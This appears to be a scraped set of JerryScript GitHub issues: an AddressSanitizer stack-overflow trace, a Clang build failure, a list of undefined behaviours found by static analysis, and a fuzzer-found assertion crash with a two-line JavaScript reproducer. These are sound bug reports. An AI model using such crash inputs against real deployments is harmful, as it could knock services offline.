#167 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#168 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#169 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#170 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#171 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#172 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#173 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#174 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#175 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#176 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#177 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#178 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#179 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#180 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#181 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#182 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#183 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#184 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#185 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#186 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#187 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#188 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#189 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#190 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#191 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#192 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#193 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#194 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#195 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#196 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#197 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#198 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#199 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#200 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#201 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#202 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#203 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#204 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#205 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#206 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#207 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#208 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#209 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#210 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#211 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#212 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#213 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#214 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#215 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#216 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#217 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#218 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#219 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#220 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#221 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#222 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#223 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#224 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#225 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#226 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#227 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#228 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#229 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#230 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#231 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#232 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#233 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#234 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#235 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#236 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#237 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#238 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#239 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#240 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#241 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#242 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#243 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#244 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#245 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#246 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#247 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#248 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#249 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#250 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
SUMMARY: AddressSanitizer: stack-overflow /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-objects.c:795 ecma_op_object_get_with_receiver
==3664==ABORTING | Stack overflow at ecma_op_object_get_with_receiver jerry-core/ecma/operations/ecma-objects.c:795 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4300/comments | 3 | 2020-10-20T06:53:19Z | 2020-10-22T08:34:22Z | https://github.com/jerryscript-project/jerryscript/issues/4300 | 725,263,527 | 4,300 |
[
"jerryscript-project",
"jerryscript"
]
| ```shellsession
andres6936@Tierra ~/CLionProjects/jerryscript/cmake-build-debug $ uname -a
Linux Tierra 4.15.0-46-generic #49~16.04.1-Ubuntu SMP Tue Feb 12 17:45:24 UTC 2019 x86_64 GNU/Linux
```
```shellsession
andres6936@Tierra ~/CLionProjects/jerryscript/cmake-build-debug $ clang -v
clang version 10.0.0
Target: x86_64-unknown-linux-gnu
Thread model: posix
InstalledDir: /usr/local/bin
```
<details>
<summary>See CMake ..</summary>
```shellsession
andres6936@Tierra ~/CLionProjects/jerryscript/cmake-build-debug $ cmake ..
-- The C compiler identification is Clang 10.0.0
-- Check for working C compiler: /usr/local/bin/clang
-- Check for working C compiler: /usr/local/bin/clang -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- CMAKE_BUILD_TYPE MinSizeRel
-- CMAKE_C_COMPILER_ID Clang
-- CMAKE_SYSTEM_NAME Linux
-- CMAKE_SYSTEM_PROCESSOR x86_64
-- BUILD_SHARED_LIBS OFF
-- ENABLE_LTO ON
-- ENABLE_STRIP ON
-- JERRY_CMDLINE ON
-- JERRY_CMDLINE_TEST OFF
-- JERRY_CMDLINE_SNAPSHOT OFF
-- JERRY_LIBFUZZER OFF
-- JERRY_PORT_DEFAULT ON (FORCED BY CMDLINE OR LIBFUZZER OR TESTS)
-- JERRY_EXT ON (FORCED BY CMDLINE OR TESTS)
-- JERRY_LIBM ON
-- UNITTESTS OFF
-- DOCTESTS OFF
-- ENABLE_ALL_IN_ONE OFF
-- JERRY_CPOINTER_32_BIT OFF
-- JERRY_DEBUGGER OFF
-- JERRY_ERROR_MESSAGES OFF
-- JERRY_EXTERNAL_CONTEXT OFF
-- JERRY_PARSER ON
-- JERRY_LINE_INFO OFF
-- JERRY_LOGGING OFF
-- JERRY_MEM_STATS OFF
-- JERRY_MEM_GC_BEFORE_EACH_ALLOC OFF
-- JERRY_PARSER_DUMP_BYTE_CODE OFF
-- JERRY_PROFILE es.next
-- JERRY_REGEXP_STRICT_MODE OFF
-- JERRY_REGEXP_DUMP_BYTE_CODE OFF
-- JERRY_SNAPSHOT_EXEC OFF
-- JERRY_SNAPSHOT_SAVE OFF
-- JERRY_SYSTEM_ALLOCATOR OFF
-- JERRY_VALGRIND OFF
-- JERRY_VM_EXEC_STOP OFF
-- JERRY_GLOBAL_HEAP_SIZE (512)
-- JERRY_GC_LIMIT (0)
-- JERRY_STACK_LIMIT (0)
-- JERRY_GC_MARK_LIMIT (8)
-- FEATURE_INIT_FINI OFF
-- Performing Test HAVE_TM_GMTOFF
-- Performing Test HAVE_TM_GMTOFF - Failed
-- Looking for include file time.h
-- Looking for include file time.h - not found
-- Looking for include file unistd.h
-- Looking for include file unistd.h - not found
-- ENABLE_LINK_MAP OFF
-- JERRY_TEST_STACK_MEASURE OFF
-- Configuring done
-- Generating done
-- Build files have been written to: /home/andres6936/CLionProjects/jerryscript/cmake-build-debug
```
</details>
```shellsession
andres6936@Tierra ~/CLionProjects/jerryscript/cmake-build-debug $ make -j2
...
[ 12%] Linking C static library ../lib/libjerry-libm.a
[ 12%] Built target jerry-libm
Scanning dependencies of target jerry-core
...
[ 18%] Building C object jerry-core/CMakeFiles/jerry-core.dir/ecma/base/ecma-helpers-value.c.o
/home/andres6936/CLionProjects/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:564:17: error: implicit conversion from 'ecma_length_t' (aka 'unsigned long') to 'double' may lose precision [-Werror,-Wimplicit-int-float-conversion]
JERRY_ASSERT (number <= ECMA_NUMBER_MAX_SAFE_INTEGER);
^~~~~~ ~~
/home/andres6936/CLionProjects/jerryscript/jerry-core/jrt/jrt.h:88:21: note: expanded from macro 'JERRY_ASSERT'
JERRY_UNUSED (x); \
^
/home/andres6936/CLionProjects/jerryscript/jerry-core/jrt/jrt.h:34:34: note: expanded from macro 'JERRY_UNUSED'
#define JERRY_UNUSED(x) ((void) (x))
^
/home/andres6936/CLionProjects/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2971:17: error: implicit conversion from 'ecma_length_t' (aka 'unsigned long') to 'double' may lose precision [-Werror,-Wimplicit-int-float-conversion]
JERRY_ASSERT (index <= ECMA_NUMBER_MAX_SAFE_INTEGER);
^~~~~ ~~
/home/andres6936/CLionProjects/jerryscript/jerry-core/jrt/jrt.h:88:21: note: expanded from macro 'JERRY_ASSERT'
JERRY_UNUSED (x); \
^
/home/andres6936/CLionProjects/jerryscript/jerry-core/jrt/jrt.h:34:34: note: expanded from macro 'JERRY_UNUSED'
#define JERRY_UNUSED(x) ((void) (x))
^
2 errors generated.
make[2]: *** [jerry-core/CMakeFiles/jerry-core.dir/build.make:219: jerry-core/CMakeFiles/jerry-core.dir/ecma/base/ecma-helpers-string.c.o] Error 1
make[2]: *** Waiting for unfinished jobs....
make[2]: Leaving directory '/home/andres6936/CLionProjects/jerryscript/cmake-build-debug'
make[1]: *** [CMakeFiles/Makefile2:235: jerry-core/CMakeFiles/jerry-core.dir/all] Error 2
make[1]: Leaving directory '/home/andres6936/CLionProjects/jerryscript/cmake-build-debug'
make: *** [Makefile:130: all] Error 2
```
**The warnings are being treated as errors, hence the compilation process is over.** | Problem Compile Under Ubuntu x86-64 [Clang 10.0] | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4295/comments | 3 | 2020-10-18T23:33:03Z | 2020-10-19T08:16:43Z | https://github.com/jerryscript-project/jerryscript/issues/4295 | 724,167,612 | 4,295 |
[
"jerryscript-project",
"jerryscript"
]
| Hi,
I initiated the configuration of JerryScript on the new tool TrustInSoft CI. It's a source code analyzer, which analyzes execution paths (usually unit tests in your repo) to detect Undefined Behaviors along the way. Coverage includes all the defects that sanitizers ASAN, UBSan and MSan find, plus a large number of other (usually subtle) defects.
So I've [set up TrustInSoft CI](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/2) on your test suite located in the `tests/unit-core/` folder. It has found several Undefined Behaviors on the tested execution paths. For each test, TrustInSoft CI stops the analysis on the first UB, so I went step-by-step: provided a fix for the first UB, reviewed the updated analysis results, provided a fix for the next UB, etc. This is the typical workflow, we can iterate like this until all tests are green, but I've stopped at the thirteenth encountered UB.
You can see all the steps here: https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript
Below is a summary of suggested fixes (or workarounds, when I was not sure how to fix the UB properly) for the first 13 UBs.
1. Can you let me know if you find those results interesting?
2. All these analyses were performed for the x86-64 architecture. Would you be interested in testing with other architectures ([32-bit, big-endian, etc](https://docs.ci.trust-in-soft.com/reference/supported-architectures))?
3. As side note, we are currently testing this new tool with the open-source community, so any feedback from JerryScript team will be much appreciated!
ID | Status | Fix | Notes
--- | --- | --- | ---
[UB#1](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/2?page=1&test=1,9,5,3,7,8,16,2,6) | **Invalid pointer arithmetic** [in file 'jerry-core/parser/js/js-parser.c' line 2217](https://github.com/jakub-zwolakowski/jerryscript/blob/44b29ada02d50069fb11e8c38e629f3b17e63443/jerry-core/parser/js/js-parser.c#L2217-L2221). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/8da946c69fc8f5af1b83d9682e35d13eb4fdc592) | `NULL + 0`
[UB#2](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/3?page=1&test=1,9,13,3,8,16,2) | **Index out of bound** [in file 'jerry-core/parser/js/js-parser-mem.c' line 399](https://github.com/jakub-zwolakowski/jerryscript/blob/8da946c69fc8f5af1b83d9682e35d13eb4fdc592/jerry-core/parser/js/js-parser-mem.c#L399). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/576910f68d5a23f9b98a5e01ee1ddd25b706e745) | `uint8_t bytes[1];` used instead of a Flexible Array Member in a struct
[UB#3](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/4?page=1&test=1,13,16) | **Invalid pointer comparison** [in file 'jerry-core/parser/js/js-scanner-util.c' line 205](https://github.com/jakub-zwolakowski/jerryscript/blob/576910f68d5a23f9b98a5e01ee1ddd25b706e745/jerry-core/parser/js/js-scanner-util.c#L205). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/63f6c18a4aacc5b3df08b0caa81fee8441d12c34) | `<address> < NULL`
[UB#4](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/5?page=1&test=9,5,3,8,2) | **Invalid pointer arithmetic** [in file 'jerry-core/parser/js/js-scanner-util.c' line 527](https://github.com/jakub-zwolakowski/jerryscript/blob/63f6c18a4aacc5b3df08b0caa81fee8441d12c34/jerry-core/parser/js/js-scanner-util.c#L527). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/b010eb135cd27e65f562578093e971a0b5a5c2f7) | `<address of a string literal> - 1`
[UB#5](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/6?page=1&test=1,13,16) | **Invalid pointer arithmetic** [in file 'jerry-core/parser/js/js-scanner-util.c' line 2082](https://github.com/jakub-zwolakowski/jerryscript/blob/b010eb135cd27e65f562578093e971a0b5a5c2f7/jerry-core/parser/js/js-scanner-util.c#L2082). | [workaround commit](https://github.com/jakub-zwolakowski/jerryscript/commit/bb2f13cd7a92c46d29a9d6e568cb198c43a63f61) |
[UB#6](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/6?page=1&test=9,5,3,8,2) | **Invalid pointer arithmetic** [in file 'jerry-core/parser/js/js-scanner-util.c' line 2069](https://github.com/jakub-zwolakowski/jerryscript/blob/b010eb135cd27e65f562578093e971a0b5a5c2f7/jerry-core/parser/js/js-scanner-util.c#L2069). | [workaround commit](https://github.com/jakub-zwolakowski/jerryscript/commit/bb2f13cd7a92c46d29a9d6e568cb198c43a63f61) |
[UB#7](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/7?page=1&test=3,2) | **Invalid pointer comparison** [in file 'jerry-core/parser/js/js-lexer.c' line 2532](https://github.com/jakub-zwolakowski/jerryscript/blob/bb2f13cd7a92c46d29a9d6e568cb198c43a63f61/jerry-core/parser/js/js-lexer.c#L2532). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/0cfc99721fbf3bffd80506fbba2b3816c9c18ecd) | `NULL < NULL`
[UB#8](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/8?page=1&test=3,14,2) | **Conversion from float to int exceeds the range of integer type** [in file 'jerry-core/ecma/base/ecma-helpers-value.c' line 581](https://github.com/jakub-zwolakowski/jerryscript/blob/0cfc99721fbf3bffd80506fbba2b3816c9c18ecd/jerry-core/ecma/base/ecma-helpers-value.c#L581). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/2f8b94482fc81faf8efb329d18d3b9b0d5c010a7) | Converting floating-point value to integer exceeding the range of the integer type (an infinity, a NaN, a huge negative number).
[UB#9](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/9?page=2&test=27) | **Invalid pointer comparison** [in file 'jerry-core/ecma/base/ecma-helpers-string.c' line 1818](https://github.com/jakub-zwolakowski/jerryscript/blob/2f8b94482fc81faf8efb329d18d3b9b0d5c010a7/jerry-core/ecma/base/ecma-helpers-string.c#L1818). | [workaround commit](https://github.com/jakub-zwolakowski/jerryscript/commit/785abf9492a72942e4342be0496e1bb042cbd198) |
[UB#10](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/9?page=1&test=9,8,16,2) | **Invalid pointer comparison** [in file 'jerry-core/ecma/base/ecma-helpers-string.c' line 1578](https://github.com/jakub-zwolakowski/jerryscript/blob/2f8b94482fc81faf8efb329d18d3b9b0d5c010a7/jerry-core/ecma/base/ecma-helpers-string.c#L1578). | [workaround commit](https://github.com/jakub-zwolakowski/jerryscript/commit/785abf9492a72942e4342be0496e1bb042cbd198) |
[UB#11](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/10?page=1&test=5) | **Invalid shift operation** [in file 'jerry-core/ecma/base/ecma-helpers-conversion.c' line 671](https://github.com/jakub-zwolakowski/jerryscript/blob/785abf9492a72942e4342be0496e1bb042cbd198/jerry-core/ecma/base/ecma-helpers-conversion.c#L671). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/90c97fee6ca924a7c6bf42e07705cbe720ac89c0) | Shift by 64 where 63 is the maximum allowed.
[UB#12](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/11?page=2&test=29) | **Invalid memory access** [in file 'jerry-core/lit/lit-magic-strings.c' line 218](https://github.com/jakub-zwolakowski/jerryscript/blob/90c97fee6ca924a7c6bf42e07705cbe720ac89c0/jerry-core/lit/lit-magic-strings.c#L218). | [fix commit](https://github.com/jakub-zwolakowski/jerryscript/commit/4761f1008ba61925a69243534c1a50d0b47d791a) | Invalid `memcpy` call (dest is `NULL`, size is `0`)
[UB#13](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/12?page=2&test=31) | **Invalid function pointer** [in file 'jerry-core/ecma/base/ecma-gc.c' line 906](https://github.com/jakub-zwolakowski/jerryscript/blob/4761f1008ba61925a69243534c1a50d0b47d791a/jerry-core/ecma/base/ecma-gc.c#L906). | [workaround commit](https://github.com/jakub-zwolakowski/jerryscript/commit/6f44502d11641ef19d9c07737264ad1172afb057) |
[UB#14](https://ci.trust-in-soft.com/projects/jakub-zwolakowski/jerryscript/13?page=3&test=43) | **Subtractions between pointers that may not point to the same allocated block** [in file 'jerry-core/parser/js/js-parser.c' line 132](https://github.com/jakub-zwolakowski/jerryscript/blob/6f44502d11641ef19d9c07737264ad1172afb057/jerry-core/parser/js/js-parser.c#L132). | no fix yet | Subtraction between an address of a cell in the array `code_to_snapshot` and an address of a literal string `"arguments"`.
| JerryScript under TrustInSoft CI | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4294/comments | 0 | 2020-10-17T17:55:44Z | 2020-10-17T17:55:44Z | https://github.com/jerryscript-project/jerryscript/issues/4294 | 723,815,160 | 4,294 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
261a55c6
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16 \
```
###### Test case
```javascript
export class Dog {constructor() {}}
for (var a
```
###### Output
```text
ICE: Assertion '!(scanner_context.active_literal_pool_p->status_flags & SCANNER_LITERAL_POOL_IN_EXPORT)' failed at jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_all):2883.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3634272==ERROR: AddressSanitizer: ABRT on unknown address 0x00377460 (pc 0xf7f07b49 bp 0xff8c8efc sp 0xff8c8ee0 T0)
#0 0xf7f07b48 (linux-gate.so.1+0xb48)
#1 0xf76fa4c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf76e23f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x567bad03 in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x566d811f in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x566d8160 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x56704906 in scanner_scan_all jerryscript/jerry-core/parser/js/js-scanner.c:2883
#7 0x566e6c84 in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2217
#8 0x566ebe7d in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:3100
#9 0x56645f2c in jerry_parse jerryscript/jerry-core/api/jerry.c:455
#10 0x5663fb51 in main jerryscript/jerry-main/main-unix.c:112
#11 0xf76e3ee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#12 0x5663f414 in _start (jerryscript/build/bin/jerry+0x1b414)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==3634272==ABORTING
```
